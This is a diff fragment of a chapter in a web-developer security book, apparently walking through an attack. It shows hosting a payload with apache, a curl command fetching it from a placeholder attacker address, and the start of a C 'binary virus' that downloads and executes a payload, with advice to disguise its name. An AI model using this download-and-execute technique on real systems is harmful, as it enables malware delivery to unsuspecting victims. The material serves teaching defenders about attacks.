binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G> `Service apache2 start`
 G> `curl <listener-attack-ip>/payload.txt` or just browse the payload to verify that it is hosted.
 G>
-G> Now let us create our binary virus, we will write this in c.
-I am going to call this `download-payload-execute.c` because that is what it does.
+G> Now let's create our binary virus, we will write this in C. I am going to call this `download-payload-execute.c` because that is exactly what it does.
 Obviously you would want to call it something that your target felt comfortable running.
 This is what it looks like:

 {id="download-psmsf-payload-execute", title="download-payload-execute", linenos=off, lang=c}
     #include<stdio.h>